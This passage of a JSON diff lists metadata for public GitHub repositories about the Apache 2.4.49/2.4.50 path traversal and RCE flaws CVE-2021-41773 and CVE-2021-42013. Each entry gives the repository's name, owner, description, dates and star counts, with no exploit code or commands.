"https:\/\/github.com\/vinhjaxt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vinhjaxt\/CVE-2021-41773-exploit", + "description": "CVE-2021-41773, poc, exploit", + "fork": false, + "created_at": "2021-10-07T08:10:00Z", + "updated_at": "2024-08-12T20:17:04Z", + "pushed_at": "2021-10-08T04:55:32Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414536267, + "name": "CVE-2021-41773", + "full_name": "sixpacksecurity\/CVE-2021-41773", + "owner": { + "login": "sixpacksecurity", + "id": 91971692, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91971692?v=4", + "html_url": "https:\/\/github.com\/sixpacksecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sixpacksecurity\/CVE-2021-41773", + "description": "CVE-2021-41773 exploit PoC with Docker setup.", + "fork": false, + "created_at": "2021-10-07T09:21:29Z", + "updated_at": "2021-10-07T13:00:21Z", + "pushed_at": "2021-10-07T13:00:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414574168, + "name": "POC-CVE-2021-41773", + "full_name": "Hattan515\/POC-CVE-2021-41773", + "owner": { + "login": "Hattan515", + "id": 92092916, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92092916?v=4", + "html_url": "https:\/\/github.com\/Hattan515", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hattan515\/POC-CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2021-10-07T11:31:03Z", + "updated_at": "2024-08-21T22:27:15Z", + "pushed_at": "2021-10-07T11:42:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414581409, + "name": "cve-2021-41773", + "full_name": "twseptian\/cve-2021-41773", + "owner": { + "login": "twseptian", + "id": 9025301, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/9025301?v=4", + "html_url": "https:\/\/github.com\/twseptian", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/twseptian\/cve-2021-41773", + "description": "CVE-2021-41773: Path Traversal Zero-Day in Apache HTTP Server Exploited", + "fork": false, + "created_at": "2021-10-07T11:55:10Z", + "updated_at": "2024-09-26T02:12:24Z", + "pushed_at": "2021-10-10T05:19:29Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve-2021-41773", + "path-traversal", + "shodan", + "shodan-cli", + "vulnerability" + ], + "visibility": "public", + "forks": 3, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414592683, + "name": "CVE-2021-41773", + "full_name": "noflowpls\/CVE-2021-41773", + "owner": { + "login": "noflowpls", + "id": 84136529, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84136529?v=4", + "html_url": "https:\/\/github.com\/noflowpls", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/noflowpls\/CVE-2021-41773", + "description": "CVE-2021-41773", + "fork": false, + "created_at": "2021-10-07T12:30:13Z", + "updated_at": "2024-08-12T20:17:04Z", + "pushed_at": "2022-11-15T08:51:33Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414639113, + "name": "CVE-2021-41773", + "full_name": "McSl0vv\/CVE-2021-41773", + "owner": { + "login": "McSl0vv", + "id": 36660195, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36660195?v=4", + "html_url": "https:\/\/github.com\/McSl0vv", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/McSl0vv\/CVE-2021-41773", + "description": "Apache 2.4.49 Exploit", + "fork": false, + "created_at": "2021-10-07T14:41:05Z", + "updated_at": "2021-10-07T14:46:05Z", + "pushed_at": "2021-10-07T14:46:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414646379, + "name": "CVE-2021-41773", + "full_name": "shiomiyan\/CVE-2021-41773", + "owner": { + "login": "shiomiyan", + "id": 35842766, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35842766?v=4", + "html_url": "https:\/\/github.com\/shiomiyan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shiomiyan\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2021-10-07T15:00:55Z", + "updated_at": "2021-10-15T19:28:33Z", + "pushed_at": "2021-10-15T19:28:30Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414650983, + "name": "mass_cve-2021-41773", + "full_name": "justakazh\/mass_cve-2021-41773", + "owner": { + "login": "justakazh", + "id": 36891477, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36891477?v=4", + "html_url": "https:\/\/github.com\/justakazh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/justakazh\/mass_cve-2021-41773", + "description": "MASS CVE-2021-41773", + "fork": false, + "created_at": "2021-10-07T15:13:18Z", + "updated_at": "2024-08-12T20:17:04Z", + "pushed_at": "2023-11-14T07:00:33Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "automatic", + "cve-2021-41773", + "exploit", + "scanner" + ], + "visibility": "public", + "forks": 24, + "watchers": 27, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 414804962, + "name": "CVE-2021-41773", + "full_name": "shellreaper\/CVE-2021-41773", + "owner": { + "login": "shellreaper", + "id": 76930483, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76930483?v=4", + "html_url": "https:\/\/github.com\/shellreaper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shellreaper\/CVE-2021-41773", + "description": "This is a simple POC for Apache\/2.4.49 Path Traversal Vulnerability", + "fork": false, + "created_at": "2021-10-08T01:13:33Z", + "updated_at": "2024-08-12T20:17:05Z", + "pushed_at": "2021-11-12T00:03:34Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414845157, + "name": "CVE-2021-41773", + "full_name": "0xRar\/CVE-2021-41773", + "owner": { + "login": "0xRar", + "id": 33517160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33517160?v=4", + "html_url": "https:\/\/github.com\/0xRar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xRar\/CVE-2021-41773", + "description": "Exploit for Apache 2.4.49", + "fork": false, + "created_at": "2021-10-08T04:26:31Z", + "updated_at": "2024-08-12T20:17:05Z", + "pushed_at": "2021-10-08T05:54:25Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414848372, + "name": "Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt", + "full_name": "pisut4152\/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt", + "owner": { + "login": "pisut4152", + "id": 72641661, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72641661?v=4", + "html_url": "https:\/\/github.com\/pisut4152", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pisut4152\/Sigma-Rule-for-CVE-2021-41773-and-CVE-2021-42013-exploitation-attempt", + "description": null, + "fork": false, + "created_at": "2021-10-08T04:43:27Z", + "updated_at": "2024-08-12T20:17:05Z", + "pushed_at": "2021-10-08T04:46:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 414878778, + "name": "CVE-2021-41773", + "full_name": "corelight\/CVE-2021-41773", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/CVE-2021-41773", + "description": "A Zeek package which raises notices for Path Traversal\/RCE in Apache HTTP Server 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013)", + "fork": false, + "created_at": "2021-10-08T06:54:27Z", + "updated_at": "2021-10-28T05:48:41Z", + "pushed_at": "2021-10-28T05:55:41Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 414887591, + "name": "CVE-2021-41773", + "full_name": "zeronine9\/CVE-2021-41773", + "owner": { + "login": "zeronine9", + "id": 60152515, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60152515?v=4", + "html_url": "https:\/\/github.com\/zeronine9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zeronine9\/CVE-2021-41773", + "description": "Fast python tool to test apache path traversal CVE-2021-41773 in a List of url ", + "fork": false, + "created_at": "2021-10-08T07:24:49Z", + "updated_at": "2024-08-12T20:17:06Z", + "pushed_at": "2021-10-08T07:27:04Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 414907601, + "name": "CVE-2021-41773", + "full_name": "b1tsec\/CVE-2021-41773", + "owner": { + "login": "b1tsec", + "id": 74562513, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74562513?v=4", + "html_url": "https:\/\/github.com\/b1tsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b1tsec\/CVE-2021-41773", + "description": "A Python script to check if an Apache web server is vulnerable to CVE-2021-41773", + "fork": false, + "created_at": "2021-10-08T08:32:51Z", + "updated_at": "2024-08-12T20:17:06Z", + "pushed_at": "2021-10-08T12:15:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 415041820, + "name": "CVE-2021-41773", + "full_name": "superzerosec\/CVE-2021-41773", + "owner": { + "login": "superzerosec", + "id": 57648217, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57648217?v=4", + "html_url": "https:\/\/github.com\/superzerosec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/superzerosec\/CVE-2021-41773", + "description": "POC", + "fork": false, + "created_at": "2021-10-08T15:40:41Z", + "updated_at": "2024-08-12T20:17:06Z", + "pushed_at": "2021-10-11T22:24:12Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 415177333, + "name": "apachrot", + "full_name": "im-hanzou\/apachrot", + "owner": { + "login": "im-hanzou", + "id": 61415393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61415393?v=4", + "html_url": "https:\/\/github.com\/im-hanzou", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/im-hanzou\/apachrot", + "description": "Apache (Linux) CVE-2021-41773\/2021-42013 Mass Vulnerability Checker", + "fork": false, + "created_at": "2021-10-09T02:12:39Z", + "updated_at": "2024-10-25T23:47:22Z", + "pushed_at": "2021-10-12T07:27:09Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "checker", + "cve-2021-41773", + "cve-2021-42013", + "vulnerability" + ], + "visibility": "public", + "forks": 6, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 415191949, + "name": "CVE-2021-41773_CVE-2021-42013", + "full_name": "inbug-team\/CVE-2021-41773_CVE-2021-42013", + "owner": { + "login": "inbug-team", + "id": 81735769, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81735769?v=4", + "html_url": "https:\/\/github.com\/inbug-team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/inbug-team\/CVE-2021-41773_CVE-2021-42013", + "description": "CVE-2021-41773 CVE-2021-42013漏洞批量检测工具", + "fork": false, + "created_at": "2021-10-09T03:32:18Z", + "updated_at": "2024-11-06T23:16:22Z", + "pushed_at": "2021-10-09T03:49:21Z", + "stargazers_count": 148, + "watchers_count": 148, + "has_discussions": false, + "forks_count": 51, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 51, + "watchers": 148, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 415290894, + "name": "cve-2021-41773-and-cve-2021-42013", + "full_name": "5gstudent\/cve-2021-41773-and-cve-2021-42013", + "owner": { + "login": "5gstudent", + "id": 37172754, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37172754?v=4", + "html_url": "https:\/\/github.com\/5gstudent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/5gstudent\/cve-2021-41773-and-cve-2021-42013", + "description": "cve-2021-41773 即 cve-2021-42013 批量检测脚本", + "fork": false, + "created_at": "2021-10-09T11:33:56Z", + "updated_at": "2024-09-15T12:36:18Z", + "pushed_at": "2021-10-09T12:14:29Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 415357102, + "name": "CVE-2021-41773", + "full_name": "EagleTube\/CVE-2021-41773", + "owner": { + "login": "EagleTube", + "id": 87413459, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87413459?v=4", + "html_url": "https:\/\/github.com\/EagleTube", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EagleTube\/CVE-2021-41773", + "description": "Apache 2.4.49 Path Traversal Vulnerability Checker ", + "fork": false, + "created_at": "2021-10-09T16:07:57Z", + "updated_at": "2024-08-12T20:17:08Z", + "pushed_at": "2021-10-09T16:32:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 415737041, + "name": "Apachuk", + "full_name": "apapedulimu\/Apachuk", + "owner": { + "login": "apapedulimu", + "id": 16370264, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16370264?v=4", + "html_url": "https:\/\/github.com\/apapedulimu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/apapedulimu\/Apachuk", + "description": "CVE-2021-41773 Grabber", + "fork": false, + "created_at": "2021-10-11T00:57:27Z", + "updated_at": "2024-08-12T20:17:11Z", + "pushed_at": "2021-10-11T02:51:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 415761005, + "name": "CVE-2021-41773", + "full_name": "scarmandef\/CVE-2021-41773", + "owner": { + "login": "scarmandef", + "id": 80011252, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80011252?v=4", + "html_url": "https:\/\/github.com\/scarmandef", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/scarmandef\/CVE-2021-41773", + "description": " Apache HTTP Server 2.4.49, 2.4.50 - Path Traversal & RCE", + "fork": false, + "created_at": "2021-10-11T03:03:08Z", + "updated_at": "2021-10-14T04:59:46Z", + "pushed_at": "2021-10-14T04:59:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 416511119, + "name": "httpd-2.4.49", + "full_name": "ksanchezcld\/httpd-2.4.49", + "owner": { + "login": "ksanchezcld", + "id": 3130599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3130599?v=4", + "html_url": "https:\/\/github.com\/ksanchezcld", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ksanchezcld\/httpd-2.4.49", + "description": "critical: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013)", + "fork": false, + "created_at": "2021-10-12T22:02:09Z", + "updated_at": "2023-04-29T16:26:04Z", + "pushed_at": "2021-10-12T22:02:19Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 416830075, + "name": "SimplesApachePathTraversal", + "full_name": "MrCl0wnLab\/SimplesApachePathTraversal", + "owner": { + "login": "MrCl0wnLab", + "id": 17049332, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17049332?v=4", + "html_url": "https:\/\/github.com\/MrCl0wnLab", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MrCl0wnLab\/SimplesApachePathTraversal", + "description": "Tool check: CVE-2021-41773, CVE-2021-42013, CVE-2020-17519", + "fork": false, + "created_at": "2021-10-13T17:03:56Z", + "updated_at": "2024-08-28T17:32:14Z", + "pushed_at": "2024-08-14T14:41:14Z", + "stargazers_count": 60, + "watchers_count": 60, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2020-17519", + "cve-2021-41773", + "cve-2021-42013" + ], + "visibility": "public", + "forks": 15, + "watchers": 60, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 417461813, + "name": "apache-httpd-path-traversal-checker", + "full_name": "theLSA\/apache-httpd-path-traversal-checker", + "owner": { + "login": "theLSA", + "id": 28248956, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28248956?v=4", + "html_url": "https:\/\/github.com\/theLSA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/theLSA\/apache-httpd-path-traversal-checker", + "description": "apache httpd path traversal checker(CVE-2021-41773 \/ CVE-2021-42013)", + "fork": false, + "created_at": "2021-10-15T10:38:44Z", + "updated_at": "2023-03-19T15:06:52Z", + "pushed_at": "2021-10-16T10:28:23Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 8, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 417643516, + "name": "CVE-2021-41773", + "full_name": "LudovicPatho\/CVE-2021-41773", + "owner": { + "login": "LudovicPatho", + "id": 26960886, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26960886?v=4", + "html_url": "https:\/\/github.com\/LudovicPatho", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LudovicPatho\/CVE-2021-41773", + "description": "The first vulnerability with the CVE identifier CVE-2021-41773 is a path traversal flaw that exists in Apache HTTP Server 2.4.49.", + "fork": false, + "created_at": "2021-10-15T21:38:48Z", + "updated_at": "2023-12-13T10:08:43Z", + "pushed_at": "2022-10-26T18:01:44Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 417869261, + "name": "CVE-2021-41773_Honeypot", + "full_name": "lopqto\/CVE-2021-41773_Honeypot", + "owner": { + "login": "lopqto", + "id": 30213943, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30213943?v=4", + "html_url": "https:\/\/github.com\/lopqto", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lopqto\/CVE-2021-41773_Honeypot", + "description": "Simple honeypot for CVE-2021-41773 vulnerability", + "fork": false, + "created_at": "2021-10-16T15:30:34Z", + "updated_at": "2024-03-02T10:06:40Z", + "pushed_at": "2021-10-17T08:13:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 418481558, + "name": "CVE-2021-41773_42013", + "full_name": "zerodaywolf\/CVE-2021-41773_42013", + "owner": { + "login": "zerodaywolf", + "id": 37404408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37404408?v=4", + "html_url": "https:\/\/github.com\/zerodaywolf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zerodaywolf\/CVE-2021-41773_42013", + "description": "Lab setup for CVE-2021-41773 (Apache httpd 2.4.49) and CVE-2021-42013 (Apache httpd 2.4.50).", + "fork": false, + "created_at": "2021-10-18T12:01:58Z", + "updated_at": "2024-09-26T10:44:41Z", + "pushed_at": "2021-10-18T12:47:56Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache", + "cve", + "cve-2021-41773", + "cve-2021-42013", + "httpd", + "lfi", + "penetration-testing", + "rce", + "security", + "vulnerable", + "web" + ], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 419369252, + "name": "CVE-2021-41773", + "full_name": "LayarKacaSiber\/CVE-2021-41773", + "owner": { + "login": "LayarKacaSiber", + "id": 92864439, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92864439?v=4", + "html_url": "https:\/\/github.com\/LayarKacaSiber", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LayarKacaSiber\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2021-10-20T14:41:15Z", + "updated_at": "2021-10-23T13:15:51Z", + "pushed_at": "2021-10-23T13:15:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 420144635, + "name": "CVE-2021-41773", + "full_name": "BabyTeam1024\/CVE-2021-41773", + "owner": { + "login": "BabyTeam1024", + "id": 74447452, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74447452?v=4", + "html_url": "https:\/\/github.com\/BabyTeam1024", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BabyTeam1024\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2021-10-22T15:12:12Z", + "updated_at": "2024-08-12T20:17:27Z", + "pushed_at": "2021-10-22T15:23:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 420407065, + "name": "cve-2021-41773", + "full_name": "walnutsecurity\/cve-2021-41773", + "owner": { + "login": "walnutsecurity", + "id": 92915142, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92915142?v=4", + "html_url": "https:\/\/github.com\/walnutsecurity", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/walnutsecurity\/cve-2021-41773", + "description": "cve-2021-41773.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.49", + "fork": false, + "created_at": "2021-10-23T12:31:53Z", + "updated_at": "2024-08-25T14:50:10Z", + "pushed_at": "2023-01-11T14:04:08Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 420528447, + "name": "CVE-2021-41773", + "full_name": "TheLastVvV\/CVE-2021-41773", + "owner": { + "login": "TheLastVvV", + "id": 71128830, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71128830?v=4", + "html_url": "https:\/\/github.com\/TheLastVvV", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheLastVvV\/CVE-2021-41773", + "description": "Poc CVE-2021-41773 - Apache 2.4.49 with CGI enabled", + "fork": false, + "created_at": "2021-10-23T21:37:25Z", + "updated_at": "2021-10-23T23:15:50Z", + "pushed_at": "2021-10-23T21:50:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 421138366, + "name": "CVE-2021-41773", + "full_name": "MazX0p\/CVE-2021-41773", + "owner": { + "login": "MazX0p", + "id": 54814433, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54814433?v=4", + "html_url": "https:\/\/github.com\/MazX0p", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MazX0p\/CVE-2021-41773", + "description": null, + "fork": false, + "created_at": "2021-10-25T18:21:43Z", + "updated_at": "2022-07-01T21:33:34Z", + "pushed_at": "2021-10-25T18:39:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 421191229, + "name": "Scanner-CVE-2021-41773", + "full_name": "vida003\/Scanner-CVE-2021-41773", + "owner": { + "login": "vida003", + "id": 77762068, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77762068?v=4", + "html_url": "https:\/\/github.com\/vida003", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vida003\/Scanner-CVE-2021-41773", + "description": "A automatic scanner to apache 2.4.49", + "fork": false, + "created_at": "2021-10-25T21:34:08Z", + "updated_at": "2021-10-25T22:17:23Z", + "pushed_at": "2021-10-25T22:17:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 421530564, + "name": "CVE-2021-41773", + "full_name": "mr-exo\/CVE-2021-41773", + "owner": { + "login": "mr-exo", + "id": 76655540, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76655540?v=4", + "html_url": "https:\/\/github.com\/mr-exo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mr-exo\/CVE-2021-41773", + "description": "Remote Code Execution exploit for Apache servers. Affected versions: Apache 2.4.49, Apache 2.4.50", + "fork": false, + "created_at": "2021-10-26T17:56:25Z", + "updated_at": "2024-07-25T10:40:47Z", + "pushed_at": "2021-10-26T18:04:43Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 422466104, + "name": "CVE-2021-41773", + "full_name": "wolf1892\/CVE-2021-41773", + "owner": { + 